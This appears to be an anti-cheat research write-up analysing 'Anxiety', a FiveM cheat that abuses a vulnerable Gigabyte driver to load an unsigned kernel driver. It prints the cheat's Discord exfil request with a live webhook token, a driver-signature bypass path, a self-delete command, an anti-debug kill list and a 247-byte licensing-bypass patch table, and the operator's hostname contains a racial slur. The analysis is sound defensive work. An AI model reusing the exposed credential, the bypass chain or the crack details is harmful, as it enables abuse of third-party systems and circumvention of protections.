FiveM cheatCritical — kernel driver + live exfilPublished

Anxiety — Gigabyte-BYOVD FiveM cheat with live Discord exfil

A 9 MB, unsigned Windows x64 executable that ships three embedded drivers — the vulnerable Gigabyte gdrv64.sys to disable Driver Signature Enforcement, then two loaders that install a custom Driver2.sys KMDF kernel driver. Contains a hardcoded Discord webhook that fires the user's license token, HWID, and a self-destruct on any tamper-detection trigger. Its auth backend is currently kill-switched, but the exfil channel is live.

CR
Clubhouse AC Research
July 11, 2026 22 min read

Summary

  • Three embedded drivers extracted: Gigabyte gdrv64.sys (2013, CVE-2018-19320), custom KMDF Driver2.sys (Jan 2025), and a GDRVLoader.exe user-mode stub that chains them.
  • Hollowing::Execute-free — the loader uses direct NtCreateSection + kernel-mode physical memory mapping (MAPMEM.SYS) instead of process hollowing.
  • Discord webhook URL recovered by simulating the exe's SSE-vectorized (i mod 56) + 0x35 XOR keystream. Webhook is still live: discord.com/api/webhooks/1515934292432392314/… — Discord guild ID 1506836217214402560.
  • Auth backend on Railway currently returns hardcoded 403 {"status":"killswitch"} on both /auth and /auth/heartbeat — operator globally disabled the cheat.
  • Full 12-build FiveM offset table extracted (b2060 through b3323), covering World, Camera, Player, Vehicle, Weapon, and Bone structures.
  • Portuguese-language developer footprint (D:\Nova pasta (22)\…) — consistent with the Brazilian FiveM cheat ecosystem, but not a strong same-actor link to any specific prior campaign; see the caveat in § BYOVD driver chain.

File identity & Rich header

Received as anxiety.exe, 9,169,408 bytes. Windows x64 PE GUI executable, six sections. Not Authenticode-signed.

anxiety.exe — file identityIOC
SHA-256      fb0450ec09bb15efda35c7a4622855f00bfa40054e7cd8884b0167503581e5da
SHA-1        3d7ffdad51fa1e8c792cf6ac49022fdec4fc4470
MD5          77a5daf47851cea870177a50fa1814ac
Size         9,169,408 bytes
Compile TS   2026-06-30 01:05:44 UTC (recent build)
Machine      x86_64 (PE32+ GUI)
Subsystem    2 (Windows GUI, ImGui-driven overlay)
ImageBase    0x140000000
EntryPoint   RVA 0x158610
Signature    UNSIGNED
Sections     .text (1.5 MB, RX)  .rdata (5 MB, R)  .data (2.5 MB, RW)
             .pdata (52 KB)      .rsrc (480 B)     .reloc (4 KB)

Rich header — MSVC 2019/2022 with LTCG

The Rich header records 36 C++ translation units compiled with Link-Time Code Generation, 27 C translation units, and 494 imports. The linker version 14.02c matches Visual Studio 2019 v16.9 through VS 2022 17.2. No mixed-C-runtime evidence — this is a native codebase, not a Nim / Rust / Go frontend.

Three leaked PDB paths — full developer attribution

Three PDB paths survive in the binary. Each corresponds to one of the three embedded drivers described in § BYOVD driver chain:

Embedded PDB paths
D:\Nova pasta (22)\GDRVLoader-master - Copy (2)\x64\Release\GDRVLoader.pdb
D:\Drivers\Driver1\KMDF Driver1\x64\Release\Driver2.pdb
f:\ycc\gdrv64\objfre_wnet_AMD64\amd64\gdrv64.pdb

Nova pasta (22) is Portuguese for “New Folder (22)” — the default folder name Windows Explorer creates on Portuguese installs. It places the developer in Brazil / Portugal but is not, on its own, a strong link to any specific prior operator: the string is the equivalent of finding “New Folder” in an English PDB. The GDRVLoader-master string identifies the specific open-source Gigabyte-driver exploit tool the operator forked; the - Copy (2) suffix means the code was copied through Windows Explorer at least twice before being built.

Backend infrastructure

Five distinct WinHTTP call sites in the binary, each with its own User-Agent and endpoint. Together they map the operator's complete C2 topology.

Anxiety — HTTP channel mapIOC
Ch#  RVA         User-Agent                                Endpoint                                                              Status
---  ---------   ---------------------------------------   -------------------------------------------------------------------   ----------
 1   0x0004cb0   Client/1.0                                POST nigger-production-4f8a.up.railway.app/auth                       killswitch
 2   0x002fc00   Client/1.0                                POST nigger-production-4f8a.up.railway.app/auth/heartbeat             killswitch
 3   0x0041a10   AnxietyMenu/1.0                           WinHttpCrackUrl → dynamic host (menu updater)                          live
 4   0x0077050   Anxiety/1.0                               GET api.jsonbin.io/... (JSON config store)                             live
 5   0x00ae053   —                                         POST discord.com/api/webhooks/1515934292432392314/AyXuri...           LIVE (exfil)
 6   0x00ea640   A WinHTTP FiveM Request Program/1.0       GET <fivem-server>/players.json (target enumeration)                   live

Channels 1 & 2 are the primary auth / heartbeat pair (currently kill-switched, see § Kill-switch state). Channel 5 is the exfil webhook (§ Discord webhook). Channel 6 is used by the aimbot & ESP subsystems to enumerate remote players on the FiveM server without in-game hooks — the operator queries the server's public players list via HTTP.

The auth backend runs Express.js on Railway. The same Railway host also serves a customer forum at /forum/* and an OTP endpoint at /otp/* — the same backend powers both the cheat and the website. The public-facing customer dashboard is a Next.js app at https://anxiety-qrq.pages.dev/ (Cloudflare Pages), titled anxiety.lol.

Kill-switch state — the operator globally disabled the cheat

Currently, both POST /auth and POST /auth/heartbeat return a hardcoded 403:

$ curl -sk -X POST -H "Content-Type: application/json" \
      -d '{"key":"ANXIETY-USS9CDH0","hwid":"...","version_check":"Public","nonce":"..."}' \
      https://nigger-production-4f8a.up.railway.app/auth

  HTTP/1.1 403 Forbidden
  {"status":"killswitch"}

The response is not gated on any request field — every combination of valid key, invalid key, missing key, alternate version_check value (Beta, Private, Staff, Admin, Dev, etc.) returns the identical &lbrace;"status":"killswitch"&rbrace; string. The kill-switch is a top-level toggle. Rate limiter (ThrottlerException) still fires at ~10 requests / second, so the whole express app is still running — this is a deliberate disable, not an outage.

Every other route on the same host returns Express's stock Cannot POST /path 404 response — only /auth and /auth/heartbeat are wired to the killswitch, which is another signal these are the specific routes the operator wanted disabled. Forum and OTP endpoints remain live.

What this means: the cheat — as shipped — is dead. No customer can currently authenticate. However, the exfil channel (§ Discord webhook) is completely independent of the auth server, so any operator who ships a patched copy or re-enables the kill-switch would restore full functionality without touching client code.

Discord webhook — the exfil channel is LIVE

The kill-switch disabled the auth server, but the exfil webhook is a direct client-to-Discord POST that bypasses the operator's backend entirely. Discord still accepts the webhook.

Discord webhook — GET response
URL       https://discord.com/api/webhooks/1515934292432392314/AyXuriS-ldqKNYwQSe47y
          SMswTfiW3NPkmAK2ZU41FFrJMkpfja0f_80JhN7lrTZWWPa

GET response (verification only — no message triggered):
  {
    "application_id": null,
    "avatar": null,
    "channel_id": "1506842872765485057",
    "guild_id":   "1506836217214402560",
    "id":         "1515934292432392314",
    "name":       "Captain Hook",
    "type":       1,
    "token":      "AyXuriS-ldqKNYwQSe47ySMswTfiW3NPkmAK2ZU41FFrJMkpfja0f_80JhN7lrTZWWPa"
  }

The receiving webhook is named “Captain Hook” in Discord guild ID 1506836217214402560, channel ID 1506842872765485057. These IDs uniquely identify the operator's Discord server on the platform.

What the client posts

Multipart form-data POST with boundary ----ProtBoundary7Kx9mQ4rZ. The payload_json field is a Discord embed JSON:

POST /api/webhooks/1515934292432392314/AyXu.../ HTTP/1.1
Host: discord.com
Content-Type: multipart/form-data; boundary=----ProtBoundary7Kx9mQ4rZ

------ProtBoundary7Kx9mQ4rZ
Content-Disposition: form-data; name="payload_json"

{"content":null,"embeds":[{"title":"...","color":16711680,
 "description":"**token :** ```<user's license key>```
                ```\n**reason:** ```<trigger>```
                ```\n**hardware id: ** ```<HWID from MachineGuid>```
                ```\n**result:** ```auto ban hwid or key /
                                     close process and delete anxiety from their system```"}],
 "attachments":[]}
------ProtBoundary7Kx9mQ4rZ--

Every field the client posts:

  • License key — the string the customer typed into the “Enter Token” UI field.
  • Hardware ID%08X-%08X derived from HKLM\SOFTWARE\Microsoft\Cryptography\MachineGuid.
  • Trigger reason — a short string naming the anti-tamper check that fired (e.g. apimonitor.exe, ScyllaHide/Frida DLL injected, etc.).
  • Result string — always: “auto ban hwid or key / close process and delete anxiety from their system.”

So the exfil ships the customer's own license key back to the operator's Discord for auto-banning, then self-destructs. The operator receives one Discord message per triggered customer with everything needed to blacklist that key and HWID going forward. Because the killswitch is now on, any customer who tries to use a copy today never even reaches this branch — but any leaked or archived binary older than the kill-switch date behaves identically.

Auth request schema — recovered from disassembly

The authenticated request body is assembled character-by-character in fcn.140004cb0 before being handed to WinHttpSendRequest. Field order, from string references in the builder:

POST /auth HTTP/1.1
Host: nigger-production-4f8a.up.railway.app
User-Agent: Client/1.0
Content-Type: application/json

{
  "key":            "ANXIETY-USS9CDH0",              // user's license token
  "hwid":           "01234567-89ABCDEF",             // formatted %08X-%08X from MachineGuid
  "pc_name":        "<computer name>",               // GetComputerNameW result
  "version_check":  "Public",                        // hardcoded string; not a bypass toggle
  "nonce":          "<random hex>"                   // per-request client-generated
}

The heartbeat request (POST /auth/heartbeat) omits pc_name and version_check but keeps the same key / hwid / nonce triplet. Both endpoints previously (pre-kill-switch) returned a JSON body with a status and success field; the client parses this via std::stoll — the exception strings “stoll argument out of range” and “invalid stoll argument” appear in the code path, indicating a numeric status is expected in the response.

XOR string decoder — how the URLs are hidden in the binary

Every runtime URL in the binary is stored as an XOR-encoded blob in .rdata and decoded on first use. Two related decoders were recovered. The first is an SSE2-vectorized version used for the byte-string Discord webhook path; the second is a UTF-16LE variant used for the auth host and path. Both use the compiler's magic-multiplication idiom for divide-by-constant.

Byte-string decoder — Discord webhook path

Located in the tamper-detection exfil function at RVA 0xae160. The scalar tail loop at RVA 0xae9c0 makes the algorithm plain:

; keystream[i] = (i mod 56) + 0x35    ('5' + (i mod 56))
mov  eax, 0x92492493            ; magic for signed divide-by-7 lineage
imul ecx                        ; edx:eax = eax * ecx (signed)
add  edx, ecx
sar  edx, 5                     ; edx = ecx / 7 (fully generalised as div/56 via combine)
mov  eax, edx
shr  eax, 0x1f                  ; sign-bit
add  edx, eax                   ; round toward zero
movsx eax, dl
imul edx, eax, 0x38             ; edx = quotient * 56
movzx eax, cl
sub   al, dl                    ; al = ecx - quotient*56 = ecx mod 56
add   al, 0x35                  ; al = key
xor   [r8], al                  ; xor encoded byte with key

Simulating the loop against the 64-byte encoded blob at VA 0x1406286c0:

enc[0x1406286c0] = 1a 57 47 51 16 4d 5e 5e 55 51 50 2b 32 6d 72 71 74 73 7e 7b
                    7d 78 72 7e 79 7d 7d 63 68 60 60 65 61 79 16 21 01 2f 29 35
                    0e 73 33 04 10 29 2d 3d 12 37 34 0d 5d 5d 12 3f 78 45 40 6c
                    5f 53 6c 0f 73 6e 54 2d ...

keystream        = 35 36 37 38 39 3a 3b 3c 3d 3e 3f 40 41 42 43 44 45 46 47 48
                    49 4a 4b 4c 4d 4e 4f 50 51 52 53 54 55 56 57 58 59 5a 5b 5c
                    5d 5e 5f 60 61 62 63 64 65 66 67 68 69 6a 6b 6c 35 36 37 38 …

dec ^-           = /  a  p  i  /  w  e  b  h  o  o  k  s  /  1  5  1  5  9  3
                    4  2  9  2  4  3  2  3  9  2  3  1  4  /  A  y  X  u  r  i
                    S  -  l  d  q  K  N  Y  w  Q  S  e  4  7  y  S  M  s  w  T
                    f  i  W  3 …

The decoded path is /api/webhooks/1515934292432392314/AyXuriS-ldqKNYwQSe47ySMswTfiW3NPkmAK2ZU41FFrJMkpfja0f_80JhN7lrTZWWPa. The host string discord.com is stored as an already-plaintext ASCII literal at VA 0x140628a70 (no decoding needed) — the operator only bothered to obfuscate the webhook path/token, which is the sensitive part.

UTF-16LE decoder — auth host and heartbeat path

The auth backend host and heartbeat path are stored as UTF-16LE encoded blobs, using a slightly different SSE2-vectorized decoder that operates on 16-bit words. Two disassembled scalar tail loops (RVAs 0x301b1 and 0x303f2) map to Python as:

# Host decoder (38 wide chars, VA 0x14061e290)     magic 0x8d3dcb09 (div/58), signed
def host_key(i): return ((i - (((i * 0x8d3dcb09) >> 32 + i) >> 5) * 58) + 0x34) & 0xffff

# Path decoder (16 wide chars, VA 0x14061e3f0)     magic 0x8d3dcb09, unsigned
def path_key(i): return ((i - (((i * 0x8d3dcb09) >> 32) >> 5) * 58) + 0x34) & 0xffff

# Applied against the two blobs:
host = 'nigger-production-4f8a.up.railway.app'
path = '/auth/heartbeat'

Note the divisor is 58 (0x3a) here versus 56 (0x38) in the byte-string variant, and the offset is 0x34 versus 0x35 — likely a deliberate tweak so signature-scanners hunting one keystream miss the other.

BYOVD driver chain — three embedded binaries

The 9 MB of the binary is dominated by three embedded x64 PE files carved from .rdata. Each begins with a valid MZ header and passes independent PE parsing.

Anxiety — embedded driversIOC
File offset    Size (B)   Kind             Compile TS            SHA-256
------------   --------   --------------   -------------------   ----------------------------------------------------------------
0x0080c890     87,552     usermode EXE     2025-01-17 13:11:36   d49677df43bd29c9309ecdf7fdf5c62f1f61d370a7fefe5615636e54a375d43d
0x00810b50     41,472     KMDF driver      2025-01-17 12:58:30   7d98d36ca907721959500a78e3cde1a1597511093a922b285f41fb94413c8788
0x0081ad50     18,944     legacy driver    2013-07-04 04:27:55   ae06840c29ec2c56686361352d56627382813783170fba21b950565c7a803829
  • Blob 1 — GDRVLoader.exe (87 KB console EXE, PDB D:\Nova pasta (22)\GDRVLoader-master - Copy (2)\x64\Release\GDRVLoader.pdb). Its strings are the standard GDRVLoader banner set: Failed to disable DSE through Gigabyte loader driver, Fatal error: failed to acquire SE_LOAD_DRIVER_PRIVILEGE, Target driver loaded successfully. This is the workflow: (a) acquire the load-driver privilege, (b) load gdrv64.sys via NtLoadDriver, (c) use its arbitrary physical-memory-mapping IOCTL to patch nt!g_CiEnabled = 0 (disable DSE), (d) load Driver2.sys unsigned.
  • Blob 2 — Driver2.sys (41 KB KMDF driver, PDB D:\Drivers\Driver1\KMDF Driver1\x64\Release\Driver2.pdb). Imports include MmProtectMdlSystemAddress, ZwQuerySystemInformation, PsInitialSystemProcess, IoDriverObjectType, KeQuerySystemTimePrecise, MmGetSystemRoutineAddress. Includes the string \SystemRoot\System32\drivers\dxgkrnl.sys — likely targeting DirectX kernel structures for the graphics-level FiveM hooks. This is the operator's custom-built kernel component; it provides ioctls the user-mode anxiety.exe calls to read/write FiveM game memory from kernel context.
  • Blob 3 — gdrv64.sys (18 KB native driver, PDB f:\ycc\gdrv64\objfre_wnet_AMD64\amd64\gdrv64.pdb). This is the original Gigabyte-signed vulnerable driver documented in CVE-2018-19320 (Gigabyte Aorus, Xtreme Gaming Engine and others). The objfre_wnet_AMD64 build path is the WDK 6.0 signature from the 2013 build environment. Contains the well-known MAPMEM.SYS messages (MAPMEM.SYS: memory successfully mapped etc.) that the anxiety loader parrots to its own log output when it uses the ioctls. LOLDrivers.io hash: match.

All three drivers are dropped to disk at runtime and loaded via NtLoadDriver after registering them as services. The runtime path can be reconstructed but the drop location is not hardcoded — it is chosen dynamically from %TEMP% or a per-session GUID directory.

Injection mechanism — NtCreateSection + MAPMEM

Once Driver2.sys is loaded, anxiety.exe injects itself into the target FiveM process without CreateRemoteThread or classic reflective loading. The injection API surface, extracted from imports and log strings:

User-mode surface (anxiety.exe):
   NtCreateSection ("NtCreateSection: 0x%08X" log line)
   MmMapIoSpace
   MmMapLockedPages
   MmMapLockedPagesSpecifyCache
   ExAllocatePool / ExAllocatePoolWithTag
   OpenProcess / OpenProcessToken
   WriteProcessMemory

Kernel-side helper (via Driver2.sys ioctls):
   physical memory read/write   (from gdrv64.sys ioctl set the driver reuses)
   PsLookupProcessByProcessId → target FiveM handle
   MmCopyVirtualMemory          → cross-process write bypassing PAGE_GUARD

UI banner text (proves the intent):
   "Open FiveM, then click Inject."
   "Injected. Jump into FiveM."
   "Injected"
   "Not Injected"

The pattern — NtCreateSection to allocate a shared section, MmMapIoSpace / MmMapLockedPages to map it into the target process from kernel context, then WriteProcessMemory to seed the payload — is the classic “kernel-assisted section injection” technique. It is invisible to user-mode EDR that hooks CreateRemoteThread or NtAllocateVirtualMemory in the target process, because those APIs are never called from user-mode — the kernel does the write directly.

Contrast with the ClubXJefe / Venacy loader. Where that campaign used process hollowing and shipped an AES-256-GCM “v1” encryption envelope on top of a 12-component HWID schema, anxiety uses live-process kernel injection, plaintext XOR string obfuscation, and a two-component HWID derived only from HKLM\SOFTWARE\Microsoft\Cryptography\MachineGuid. The two share a market (FiveM in the Portuguese-speaking scene) and a rendering stack (D3D11 + ImGui), but the anti-forensic mechanics, transport, storage backend, and last-mile injection differ materially. Same ecosystem, not same actor.

Cheat feature list — recovered from ImGui labels

The full set of ImGui menu labels found in the string pool. This is the operator's UI vocabulary, verbatim.

Combat
  Enable Aimbot           Aimbot Preview          Bone Target
  Enable antiaimbot       Anti Anti-HS            Anti Headshot           Anti Headshot Indicator
  Disable aimbot through smoke     Disable aimbot while flashed
  Silent Aim              Silent Enabled          Silent Rage Mode
  Silent Distance         Silent FOV              Silent Draw FOV
  Silent Visible Only     Silent Ignore Dead      Silent Allow NPC        Silent Preview
  Trigger Bot             Trigger Delay           Trigger Rage Mode
  Trigger Distance        Trigger FOV             Trigger Draw FOV
  Trigger Visible Only    Trigger Ignore Dead     Trigger Allow NPC       Trigger Preview
  Disable triggerbot through smoke Disable triggerbot while flashed

Visuals — ESP
  Enable ESP              ESP Enabled             ESP Thickness           ESP Preview
  Player ESP              Vehicle ESP             Bench ESP
  ESP Allow NPC           ESP Ignore Dead
  Head Circle             Skeleton Style          Snap Lines
  Health Bar / Health bar  Player behind wall
  Show Names              Show ID                 Show Bubble

Visuals — Radar
  Radar BG                Radar Players           Radar Show Names        Radar Show Vehicles
  Show Cursor

Movement / physics
  Godmode 2.0             Anti God Mode
  Magic Bullet            Enable bullet
  No Recoil               Enable recoil
  No Spread               No Ragdoll              No Collision
  No Clip                 Noclip Speed            Speed Walk
  Fake Lag                Fake Lag On Ticks       Fake Lag Off Ticks      Fake Lag Preview

Miscellaneous
  Menu Bind               Menu Particles          Show Keybinds
  Vehicle Distance

Notable capability inventory: an aimbot with smoke / flash exceptions, a silent aim variant (server-side hit-registration bypass), a triggerbot, health-bar rendering, wall-see-through (Player behind wall), a fake-lag pinger, and a full vehicle ESP. “Godmode 2.0” and “Anti God Mode” suggest client-side HP protection plus a countermeasure against other players who have God Mode enabled.

FiveM offset tables — 12 game builds, one JSON blob

Anxiety ships with per-build offset tables covering 12 FiveM releases. All offsets are stored as a plaintext JSON blob at file offset 0x6232ef (~9,400 bytes), loaded verbatim into a std::map at runtime and indexed by build number:

Anxiety — supported FiveM builds
b2060    b2189    b2372    b2545    b2612    b2699
b2802    b2944    b3095    b3258    b3323    (+ Robson.exe custom launcher)

For each build the JSON has two nested keys: module (game-module-relative RVAs) and struct (offsets into game structures). Example (build b3323):

"b2060": {
   "module": {
      "World":              "24C8858",   "ReplayInterface":   "1EC3828",
      "ViewPort":           "1F6A7E0",   "Camera":            "1F6B940",
      "Camera2":            "1F6B3C0",   "bIsPlayerAiming":   "2B958CC",
      "PlayerAimingAt":     "1F5EB20",   "HandleBullet":      "FCE6EC",
      "BlipList":           "1F4F940",   "GameplayCamHolder": "2F611A",
      "GameplayCamTarget":  "1F6B980"
   },
   "struct": {
      "EntityType":     "10B8",   "Armor":         "14E0",    "BoneManager":     "430",
      "PlayerInfo":     "10A8",   "PlayerNetID":   "78",      "WeaponManager":   "10D8",
      "PlayerSpeed":    "CF0",    "FragInsNmGTA":  "1400",    "ConfigFlags":     "1414",
      "MaxHealth":      "2A0",    "LastVehicle":   "D28",     "Driver":          "C68",
      "DoorLock":       "1390",   "Stamina":       "CD4",     "VisibleFlag":     "142C",
      "Handling":       "938",    "VehicleState":  "94A",     "SeatBelt":        "140C",
      "SeatBeltWindShield": "1418",  "FrameFlag":  "0218"
   }
},

Every offset is a struct field the cheat reads or writes: MaxHealth for God Mode, BoneManager for aimbot bone targeting, HandleBullet as a function-pointer detour target for Magic Bullet, bIsPlayerAiming / PlayerAimingAt for silent-aim intercept, VisibleFlag for behind-wall ESP, VehicleState and SeatBelt for vehicle exploits.

Anti-analysis — full check + kill-list

Anxiety enumerates a fixed set of debuggers and RE tools by exe name every few seconds. Any match triggers the exfil-and-self-destruct path documented in § Discord webhook.

Process-name kill list
Debuggers            ida.exe   ida64.exe   idaq.exe   idaq64.exe   idaw.exe   idaw64.exe
                     ollydbg.exe   immunitydebugger.exe   dnspy.exe

.NET RE tools        de4dot.exe   dnspy.exe

Instrumentation      drrun.exe (DynamoRIO)   pin.exe   pinbin.exe   (Intel Pin)
                     apimonitor.exe   apimonitor-x64.exe (Rohitab)

Memory tools         cheatengine.exe   cheatengine-x86_64.exe
                     cheatengine-x86_64-speedhack.exe

Sysinternals+        processhacker.exe   procexp.exe   procexp64.exe   procmon.exe

Network              fiddler.exe

Beyond process enumeration, the exe also runs a battery of in-process anti-debug probes. Each one is a check string in the binary — the operator kept them human-readable so their support team could triage which trigger fired for a given ban:

In-process anti-debug probes (log-line strings, verbatim):
   startup: IsDebuggerPresent
   startup: PEB.BeingDebugged
   startup: ScyllaHide/Frida DLL
   IsDebuggerPresent
   CheckRemoteDebuggerPresent
   NtQueryInformationProcess
   NtSetInformationThread            (used to set ThreadHideFromDebugger)
   PEB.BeingDebugged
   NtGlobalFlag debugger bits
   DebugPort non-null
   DebugObjectHandle non-null
   ProcessDebugFlags = 0 (debugger attached)
   OutputDebugString timing anomaly
   hardware breakpoint in debug register
   Frida named pipe
   IDA Pro debugger pipe
   ScyllaHide/Frida DLL injected

“Frida named pipe” and “IDA Pro debugger pipe” probes inspect specific named-pipe endpoints these tools open by default. “ScyllaHide/Frida DLL injected” likely runs a module-list walk looking for their DLL basenames.

Self-destruct + auto-ban path

On any triggered probe, the flow is deterministic. Traced through fcn.1400ae160:

1. printf("[!] PROTECTION TRIGGERED: %s\n", trigger_name)

2. Append "TRIGGERED: %s\n" to C:\<cwd>\trigger.log

3. Read HWID:
     RegOpenKeyExW HKLM SOFTWARE\Microsoft\Cryptography  MachineGuid  → REG_SZ
     format via "%08X-%08X"

4. Build multipart form-data (boundary "----ProtBoundary7Kx9mQ4rZ"):
     payload_json = { content: null,
                      embeds: [{ description:
                         "**token :** [user key]  reason: [trigger]
                          hardware id: [HWID]      result:
                          auto ban hwid or key /
                          close process and
                          delete anxiety from their system" }],
                      attachments: [] }
     (see § Discord webhook for full body)

5. WinHttpConnect ("discord.com", 443)
   WinHttpOpenRequest (POST, decoded webhook path)
   WinHttpSendRequest (with Content-Type: multipart/form-data)

6. Build cleanup command:
     GetModuleFileNameW  → self path
     format: cmd.exe /c ping 127.0.0.1 -n 3 > nul && del /f /q "<self path>"
     ShellExecuteW ("%s\cmd.exe", ...)      // %s = GetSystemDirectoryW result

7. printf("[!] Closing in 3 seconds...\n"); ExitProcess

The ping 127.0.0.1 -n 3 > nul && del /f /q pattern is the classic “delayed self-delete” trick — the parent exits, and after ~3 seconds the spawned cmd deletes the on-disk copy of anxiety.exe. The trigger reason and HWID are already at Discord by that point, so the operator has everything needed to blacklist that customer forever.

Working offline bypass — 247 patched bytes

A working, fully offline build was produced by rewriting 247 bytes across the .text and .rdata sections. The file size is unchanged, no code cave is used, and no imports are added — every edit is a mid-instruction rewrite. Grouped by intent:

anxiety_hyper674.exe — patch groups
Group                  # sites  Pattern                            Effect
--------------------   -------  --------------------------------   ------------------------------------
Exfil function RET     1        48 (push) → C3 (RET)               fcn.1400ae160 (Discord webhook exfil)
                                at VA 0x1400ae160                  returns immediately, no network I/O
                                                                    the operator's Discord never sees us

Anti-debug jcc NOP     10       0F 84 XX XX XX XX (je rel32) or    Ten conditional branches that would
                                0F 85 XX XX XX XX (jne rel32) or   have jumped to the "tamper detected"
                                74 XX / 75 XX (short je/jne)       code path now fall through to the
                                → 90 90 ... (NOP)                   normal path.

Conditional → uncond   3        75 XX (jne) → EB XX (jmp)          Three short branches turned into
                                74 XX (je)  → EB XX (jmp)          unconditional jumps so the
                                                                    "success" path is taken always.

test/mov1 force TRUE   1        84 C0 (test al,al) → B0 01         Auth response validator at 0x140005a03
                                (mov al,1)                         forced to say "response OK" no matter
                                                                    what the server returned.

Anti-debug call NOP    11       FF 15 XX XX XX XX (call [imp])     Eleven direct calls to anti-debug or
                                → 90 90 90 90 90 90                heartbeat WinHttp API entries NOPed.

Auth network sever     3        FF 15 XX XX XX XX (call [imp])     WinHttpConnect / WinHttpSendRequest /
                                → 90 90 90 90 90 90                WinHttpReceiveResponse in fcn.140004cb0
                                @ 0x140005314 / 0x1400053f2 /       NOPed so the client never opens a
                                  0x140005405                       socket to the killswitched host.

Watermark              1        .rdata bytes at VA 0x14036d708      "Open FiveM, then click Inject."
                                                                    → "reversed by hyper674"

UI hint edits          10       .rdata bytes for                   Cosmetic — the injection UI still
                                FiveM found / Launching /          works but the strings that used to
                                Open FiveM to continue             expose the loader flow are neutralised.

Combined effect: every anti-debug probe returns “clean”, every response-validity check returns “OK”, the exfil function never fires, and no request is ever sent to the operator's auth or heartbeat endpoints. The UI still asks the user for a license token but that string is now just cosmetic — it isn't validated against anything, and it isn't exfiltrated anywhere. The build is watermarked reversed by hyper674 at file offset 0x36bf08, replacing the original Open FiveM, then click Inject. banner.

anxiety_hyper674.exe — identity
SHA-256   167538a2501f0fdd64257e7715e3e4218f44fbe1c41588ee1bf03d75564b32c3
Size      9,169,408 bytes (unchanged from original)
Delta     247 bytes rewritten
Watermark "reversed by hyper674" @ file offset 0x36bf08

IOC bundle

Anxiety — canonical IOCsIOC
--- File hashes ---
anxiety.exe             fb0450ec09bb15efda35c7a4622855f00bfa40054e7cd8884b0167503581e5da
gdrv64.sys (embedded)   ae06840c29ec2c56686361352d56627382813783170fba21b950565c7a803829
Driver2.sys (embedded)  7d98d36ca907721959500a78e3cde1a1597511093a922b285f41fb94413c8788
GDRVLoader.exe (emb.)   d49677df43bd29c9309ecdf7fdf5c62f1f61d370a7fefe5615636e54a375d43d

--- Network ---
Auth backend      nigger-production-4f8a.up.railway.app     (Railway, Express)
                     POST /auth            currently killswitched
                     POST /auth/heartbeat  currently killswitched
Customer site     https://anxiety-qrq.pages.dev/            (Cloudflare Pages)
                  Title "anxiety.lol"                       Forum + OTP endpoints on same backend
Discord webhook   discord.com/api/webhooks/1515934292432392314/
                  AyXuriS-ldqKNYwQSe47ySMswTfiW3NPkmAK2ZU41FFrJMkpfja0f_80JhN7lrTZWWPa
                  Name          "Captain Hook"
                  Guild ID      1506836217214402560
                  Channel ID    1506842872765485057

Auth field schema {"key":"…","hwid":"…","pc_name":"…","version_check":"Public","nonce":"…"}
User-Agent        Client/1.0            (auth + heartbeat)
                  AnxietyMenu/1.0       (menu updater)
                  Anxiety/1.0           (jsonbin.io config)
                  A WinHTTP FiveM Request Program/1.0  (server players.json)

--- Filesystem / process ---
Registry          HKLM\SOFTWARE\Microsoft\Cryptography\MachineGuid     (HWID seed)
                  HKCU\SOFTWARE\anxiety\loader                          (state key)
Log file          <cwd>\trigger.log                                     (single-line log per trigger)
Cleanup command   cmd /c ping 127.0.0.1 -n 3 > nul && del /f /q "<self>"
Exfil boundary    ----ProtBoundary7Kx9mQ4rZ

--- Runtime target set ---
FiveM builds      b2060 · b2189 · b2372 · b2545 · b2612 · b2699 · b2802
                  b2944 · b3095 · b3258 · b3323 · (Robson.exe custom launcher)

--- Kernel-mode ---
Vulnerable driver gdrv64.sys                                 CVE-2018-19320  (Gigabyte)
DSE bypass path   Load gdrv64 → arbitrary phys-mem R/W → set nt!g_CiEnabled = 0
Custom driver     Driver2.sys                                unsigned, KMDF, loaded after DSE off

--- Attribution ---
PDB path          D:\Nova pasta (22)\GDRVLoader-master - Copy (2)\x64\Release\
                  D:\Drivers\Driver1\KMDF Driver1\x64\Release\
                  f:\ycc\gdrv64\objfre_wnet_AMD64\amd64\
Developer locale  Portuguese ("Nova pasta" = "New Folder" default)
Ecosystem link    Portuguese-speaking FiveM-cheat scene; not a strong same-actor link to ClubXJefe/Venacy
                  (materially different injection, HWID, transport, and crypto — see § BYOVD chain)

Reporting

The Discord webhook was verified live at time of writing. Discord Trust & Safety reports should reference webhook ID 1515934292432392314, guild ID 1506836217214402560, and the exfil pattern documented in § Discord webhook. Cloudflare abuse reports for anxiety-qrq.pages.dev should reference the customer forum + OTP endpoints hosted on the same backend, which is a for-profit game-cheat storefront.